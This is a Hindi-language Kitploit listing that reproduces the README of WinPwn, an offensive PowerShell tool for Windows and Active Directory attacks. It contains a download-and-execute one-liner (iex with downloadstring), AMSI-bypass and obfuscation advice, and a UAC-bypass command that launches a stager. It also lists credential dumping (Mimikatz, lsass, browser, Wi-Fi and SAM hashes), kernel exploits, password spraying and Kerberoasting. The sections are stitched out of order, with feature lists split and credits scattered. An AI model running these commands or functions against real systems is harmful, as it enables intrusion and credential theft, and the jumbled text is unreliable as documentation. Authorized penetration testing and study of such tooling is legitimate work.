Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WinPwn — आंतरिक विंडोज़ Penetrationtest / AD-Security के लिए ऑटोमेशन | Kitploit
उपकरण/GitHubGitHub/s3cur3th1ssh1t/winpwn
भेद्यता परीक्षण फ्रेमवर्कविशेषाधिकार वृद्धिटोहीशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubs3cur3th1ssh1t/winpwn

WinPwn

आंतरिक विंडोज़ Penetrationtest / AD-Security के लिए ऑटोमेशन

रिपॉजिटरी देखें
3.7k53511 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

प्रायोजित द्वारा

     

WinPwn

पिछले कई आंतरिक पेनिट्रेशन टेस्ट में मुझे अक्सर मौजूदा Powershell Recon/Exploitation स्क्रिप्ट में प्रॉक्सी समर्थन की कमी के कारण समस्या होती थी। मैं अक्सर वर्तमान सिस्टम और/या डोमेन के बारे में जानकारी प्राप्त करने के लिए एक के बाद एक समान स्क्रिप्ट चलाता था। अधिक से अधिक आंतरिक पेनिट्रेशन टेस्ट प्रक्रियाओं (रिकॉननेसेंस और एक्सप्लॉइटेशन दोनों) को स्वचालित करने और प्रॉक्सी कारण से मैंने अपनी स्वचालित प्रॉक्सी पहचान और एकीकरण वाली स्क्रिप्ट लिखी। यह स्क्रिप्ट मुख्य रूप से प्रसिद्ध अन्य आक्रामक सुरक्षा Powershell परियोजनाओं पर आधारित है।

कोई भी सुझाव, फीडबैक, पुल रिक्वेस्ट और टिप्पणियाँ स्वागत हैं!

बस मॉड्यूल को इस प्रकार आयात करें:

Import-Module .\WinPwn.ps1 या iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')

AMSI को बायपास करने के लिए किसी मौजूदा बायपास तकनीक का उपयोग करें, AMSI ट्रिगर ढूंढें और इसे बायपास फंक्शन में मैन्युअल रूप से बदलें या ट्रिगर स्ट्रिंग को एन्कोड करें। वैकल्पिक रूप से पूरी स्क्रिप्ट को अस्पष्ट करें।

यदि आप इंटरनेट एक्सेस के बिना विंडोज सिस्टम पर फंस गए हैं - कोई समस्या नहीं, बस Offline_Winpwn.ps1 का उपयोग करें, सबसे महत्वपूर्ण स्क्रिप्ट और एक्जीक्यूटेबल शामिल हैं।

आयात के बाद उपलब्ध कार्य:

  • WinPwn -> हमले चुनने के लिए मेनू:

alt text

  • Inveigh -> Inveigh को एक नई कंसोल विंडो में निष्पादित करता है, SMB-Relay हमले जिसमें सत्र प्रबंधन (Invoke-TheHash) शामिल है

  • SessionGopher -> SessionGopher को निष्पादित करता है, आपसे पैरामीटर मांगता है

  • Kittielocal ->

    • Obfuscated Invoke-Mimikatz संस्करण
    • मेमोरी में Safetykatz
    • rundll32 तकनीक का उपयोग करके lsass डंप करें
    • Obfuscated Lazagne डाउनलोड और चलाएं
    • ब्राउज़र क्रेडेंशियल डंप करें
    • अनुकूलित Mimikittenz संस्करण
    • वाई-फाई क्रेडेंशियल एक्सफिल्ट्रेट करें
    • SAM फ़ाइल NTLM हैश डंप करें
    • SharpCloud
  • Localreconmodules ->

    • इंस्टॉल किए गए सॉफ्टवेयर, कमजोर सॉफ्टवेयर, शेयर, नेटवर्क जानकारी, समूह, विशेषाधिकार और बहुत कुछ एकत्र करें
    • SMB-Signing, LLMNR Poisoning, MITM6, WSUS over HTTP जैसी सामान्य कमजोरियों की जांच करें

पैरामीटर के बिना, अधिकांश फंक्शन केवल इंटरैक्टिव शेल से उपयोग किए जा सकते हैं। इसलिए मैंने पैरामीटर -noninteractive और -consoleoutput जोड़ने का निर्णय लिया ताकि स्क्रिप्ट को एक अतुल्यकालिक C2-फ्रेमवर्क जैसे Empire, Covenant, Cobalt Strike या अन्य से उपयोग किया जा सके। इसके अतिरिक्त, -repo पैरामीटर जोड़ा गया था ताकि WinPwn को स्थानीय रिपॉजिटरी से इसकी सभी सुविधाओं के साथ उपयोग किया जा सके। इनका उपयोग निम्नानुसार किया जा सकता है:

उपयोग:

-noninteractive -> कार्यों के लिए कोई प्रश्न नहीं, ताकि वे पूर्वनिर्धारित या उपयोगकर्ता द्वारा परिभाषित पैरामीटर के साथ चलें

-consoleoutput -> लूट/रिपोर्ट फ़ोल्डर नहीं बनाए जाते। प्रत्येक कार्य आउटपुट कंसोल पर लौटाता है ताकि आप अपने C2-फ्रेमवर्क के एजेंट लॉग में सब कुछ देख सकें उदाहरण:

WinPwn -noninteractive -consoleoutput -DomainRecon -> यह प्रत्येक एकल डोमेन रिकॉन स्क्रिप्ट और फंक्शन लौटाएगा और संभवतः आपको बहुत अधिक आउटपुट देगा

WinPwn -noninteractive -consoleoutput -Localrecon -> यह स्थानीय सिस्टम के लिए अधिकतम जानकारी एकत्र करेगा

Generalrecon -noninteractive -> बुनियादी स्थानीय रिकॉन फंक्शन निष्पादित करें और आउटपुट को संबंधित फ़ोल्डरों में संग्रहीत करें

UACBypass -noninteractive -command "C:\temp\stager.exe" -technique ccmstp -> निम्न-विशेषाधिकार सत्र से उच्च अखंडता वाली प्रक्रिया में स्टेजर निष्पादित करें

Kittielocal -noninteractive -consoleoutput -browsercredentials -> Sharpweb के माध्यम से ब्राउज़र क्रेडेंशियल डंप करें, आउटपुट कंसोल पर लौटाएं

Kittielocal -noninteractive -browsercredentials -> SAM फ़ाइल NTLM हैश डंप करें और आउटपुट को फ़ाइल में संग्रहीत करें

WinPwn -PowerSharpPack -consoleoutput -noninteractive -> मेमोरी में Seatbelt, PowerUp, Watson और अधिक C# बायनेरिज़ निष्पादित करें

Dotnetsearch -consoleoutput -noninteractive -> .NET असेंबली के लिए C:\Program Files\ और C:\Program Files (x86)\ में खोजें

WinPwn -repo http://192.168.1.10:8000/WinPwn_Repo -> इंटरनेट एक्सेस के बिना WinPwn का उपयोग करने के लिए स्थानीय वेबसर्वर को ऑफ़लाइन रिपॉजिटरी के रूप में उपयोग करें

Get_WinPwn_Repo.sh:

उपयोग: ./Get_WinPwn_Repo.sh {Option}

उदाहरण: ./Get_WinPwn_Repo.sh --install

विकल्प: --install रिपॉजिटरी डाउनलोड करें और इसे ./WinPwn_Repo/ में रखें --remove रिपॉजिटरी ./WinPwn_Repo/ को हटाएं --reinstall रिपॉजिटरी हटाएं और ./WinPwn_Repo/ में एक नया डाउनलोड करें --start-server पोर्ट 8000 पर python HTTP सर्वर शुरू करें --help यह सहायता दिखाएं

करने के लिए

  • कुछ अस्पष्टीकरण
  • अधिक अस्पष्टीकरण
  • PAC-फ़ाइल के माध्यम से प्रॉक्सी समर्थन
  • अपने स्वयं के creds रिपॉजिटरी (https://github.com/S3cur3Th1sSh1t/Creds) से स्क्रिप्ट प्राप्त करें ताकि मूल रिपॉजिटरी में परिवर्तनों से स्वतंत्र रहें
  • अधिक रिकॉन/शोषण कार्य
  • कार्यों के बेहतर प्रबंधन के लिए मेनू जोड़ें
  • Amsi बायपास
  • ETW ब्लॉक करें

श्रेय

  • Kevin-Robertson - Inveigh, Powermad, Invoke-TheHash
  • Arvanaghi - SessionGopher
  • PowerShellMafia - Powersploit
  • Dionach - PassHunt
  • A-mIn3 - WINSpect
  • 411Hall - JAWS
  • sense-of-security - ADrecon
  • dafthack - DomainPasswordSpray
  • rasta-mouse - Sherlock, Amsi बायपास, PPID Spoof & BlockDLLs
  • AlessandroZ - LaZagne
  • samratashok - nishang

समय के साथ स्टारगेज़र

Stargazers over time

कानूनी अस्वीकरण:

पूर्व आपसी सहमति के बिना लक्ष्यों पर हमला करने के लिए WinPwn का उपयोग अवैध है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की जिम्मेदारी है। डेवलपर्स कोई देयता नहीं मानते हैं और इस प्रोग्राम के दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं। केवल शैक्षिक उद्देश्यों के लिए उपयोग करें।

टूल डाउनलोड करें
  • क्रेडेंशियल या अन्य संवेदनशील जानकारी के लिए Powershell इवेंट लॉग की जांच करें
  • ब्राउज़र क्रेडेंशियल और इतिहास एकत्र करें
  • रजिस्ट्री और फ़ाइल सिस्टम में पासवर्ड खोजें
  • संवेदनशील फ़ाइलें ढूंढें (कॉन्फ़िग फ़ाइलें, RDP फ़ाइलें, keepass डेटाबेस)
  • स्थानीय सिस्टम पर .NET बायनेरिज़ खोजें
  • वैकल्पिक: Get-Computerdetails (Powersploit) और PSRecon
  • Domainreconmodules ->

    • मैन्युअल समीक्षा के लिए विभिन्न डोमेन जानकारियाँ एकत्र करें
    • विवरण फ़ील्ड में AD पासवर्ड खोजें
    • संभावित संवेदनशील डोमेन शेयर फ़ाइलों की खोज करें
    • अप्रतिबंधित प्रतिनिधिमंडल सिस्टम/उपयोगकर्ता गणना की जाती है
    • Bloodhound रिपोर्ट जनरेट करें
    • डोमेन सिस्टम के लिए MS17-10 स्कैनर
    • डोमेन सिस्टम के लिए Bluekeep स्कैनर
    • SQL सर्वर खोज और ऑडिटिंग फंक्शन - PowerUpSQL
    • डोमेन कंट्रोलर या सभी सिस्टम के लिए MS-RPRN जांच
    • Grouper2 के साथ ग्रुप पॉलिसी ऑडिट
    • ADRecon के साथ CSV फ़ाइलों (या XLS यदि एक्सेल इंस्टॉल है) में AD रिपोर्ट जनरेट होती है
    • सामान्य कमजोरियों के लिए प्रिंटर की जांच करें
    • Resource-Based Constrained Delegation हमले के पथ खोजें
    • zerologon - CVE-2020-1472 के लिए सभी DC की जांच करें
    • और भी बहुत कुछ, बस एक नज़र डालें
  • Privescmodules

    • itm4ns Invoke-PrivescCheck
    • winPEAS
    • Powersploits PowerUp Allchecks, Sherlock, GPPPasswords
    • Dll Hijacking, फ़ाइल अनुमतियाँ, रजिस्ट्री अनुमतियाँ और कमज़ोर कुंजियाँ, Rotten/Juicy Potato जांच
  • kernelexploits ->

    • MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012) केवल x86!
    • MS16-032 - (2008/7/8/10/2012)!
    • MS16-135 - (केवल WS2k16)!
    • CVE-2018-8120 - मई 2018, Windows 7 SP1/2008 SP2,2008 R2 SP1!
    • CVE-2019-0841 - अप्रैल 2019!
    • CVE-2019-1069 - Polarbear Hardlink, क्रेडेंशियल आवश्यक - जून 2019!
    • CVE-2019-1129/1130 - रेस कंडीशन, कई कोर आवश्यक - जुलाई 2019!
    • CVE-2019-1215 - सितंबर 2019 - केवल x64!
    • CVE-2020-0638 - फरवरी 2020 - केवल x64!
    • CVE-2020-0796 - SMBGhost
    • CVE-2020-0787 - मार्च 2020 - सभी विंडोज संस्करण
    • CVE-2021-34527/CVE-2021-1675 - जून 2021 - PrintNightmare
    • CVE-2021-40449 - CallbackHell - अक्टूबर 2021
    • Juicy-Potato Exploit
    • itm4ns Printspoofer
  • UACBypass ->

    • UAC Magic, James Forshaw के UAC पर तीन भागों की पोस्ट पर आधारित
    • UAC बायपास cmstp तकनीक, Oddvar Moe द्वारा
    • DiskCleanup UAC बायपास, James Forshaw द्वारा
    • DccwBypassUAC तकनीक, Ernesto Fernandez और Thomas Vanhoutte द्वारा
  • SYSTEMShell ->

    • CreateProcess का उपयोग करके सिस्टम शेल प्राप्त करें
    • NamedPipe Impersonation का उपयोग करके सिस्टम शेल प्राप्त करें
    • Token Manipulation का उपयोग करके सिस्टम शेल प्राप्त करें
    • UsoClient DLL लोड या CreateProcess का उपयोग करके बाइंड सिस्टम शेल
  • Shareenumeration -> Invoke-Filefinder और Invoke-Sharefinder (Powerview / Powersploit)

  • Domainshares -> सभी डोमेन सिस्टम पर Snaffler या Passhunt खोज

  • Groupsearch -> Get-DomainGPOUserLocalGroupMapping - ग्रुप पॉलिसी मैपिंग (Powerview / Powersploit) के माध्यम से उन सिस्टमों को ढूंढें जहां आपके पास व्यवस्थापक-पहुंच या RDP पहुंच है

  • Kerberoasting -> एक नई विंडो में Invoke-Kerberoast निष्पादित करता है और बाद में क्रैक करने के लिए हैश संग्रहीत करता है

  • PowerSQL -> SQL सर्वर खोज, वर्तमान उपयोगकर्ता के साथ पहुंच की जांच करें, डिफ़ॉल्ट क्रेडेंशियल + UNCPath इंजेक्शन हमलों के लिए ऑडिट

  • Sharphound -> Bloodhound 3.0 रिपोर्ट

  • Adidnsmenu -> Active Directory-इंटीग्रेटेड DNS नोड बनाएं या हटाएं

  • MS17-10 -> डोमेन या सभी सिस्टम में सक्रिय विंडोज सर्वर को MS17-10 (Eternalblue) कमजोरी के लिए स्कैन करें

  • Sharpcradle -> रिमोट वेबसर्वर से C# फ़ाइलें RAM में लोड करें

  • DomainPassSpray -> DomainPasswordSpray हमले, सभी डोमेन उपयोगकर्ताओं के लिए एक पासवर्ड

  • Bluekeep -> डोमेन सिस्टम के लिए Bluekeep स्कैनर

  • leechristensen - Random Repo, Spoolsample, अन्य ps1 स्क्रिप्ट
  • HarmJ0y - कई अच्छे ब्लॉगपोस्ट, Gists और स्क्रिप्ट, सभी Ghostpack बायनेरिज़
  • NETSPI - PowerUpSQL
  • Cn33liz - p0wnedShell
  • rasta-mouse - AmsiScanBufferBypass
  • l0ss - Grouper2,Snaffler,Grouper3
  • dafthack - DomainPasswordSpray
  • enjoiz - PrivEsc
  • itm4n - Invoke-PrivescCheck & PrintSpoofer
  • James Forshaw - UACBypasses
  • Oddvar Moe - UACBypass
  • Carlos Polop - winPEAS
  • gentilkiwi - Mimikatz, Kekeo
  • hlldz - Invoke-Phantom
  • Matthew Graeber - कई Ps1 स्क्रिप्ट जो लगभग हर जगह उपयोग की जाती हैं
  • Steve Borosh - Misc-Powershell-Scripts, SharpPrinter, SharpSSDP
  • Sean Metcalf - SPN-Scan + @adsecurity.org पर कई उपयोगी लेख
  • @l0ss and @Sh3r4 - Snaffler
  • FSecureLABS - GPO उपकरण
  • vletoux - PingCastle स्कैनर
  • NCCGroup + BC-Security - ZeroLogon स्कैनर
  • Bloodhound पर काम करने वाले सभी लोग - SharpHound कलेक्टर
  • klezVirus - SharpLdapRelayScan
  • cube0x0 - LdapSignCheck + अन्य उपकरण
  • @s4ntiago_p - NanoDump
  • @thefLinkk - Handlekatz
  • @Mayyhem - SharpSCCM
  • @cube0x0 - LdapSignCheck
  • @klezVirus - SharpLdapRelayScan
  • @HarmJ0y, @leechristensen, @CCob - Certify
  • @Yudasm - ShadowHound
  • समुदाय में कई अन्य लोग - मुझे यकीन है कि मैं उन कई अन्य व्यक्तियों को भूल गया हूं जिन्होंने अप्रत्यक्ष रूप से इस स्क्रिप्ट में योगदान दिया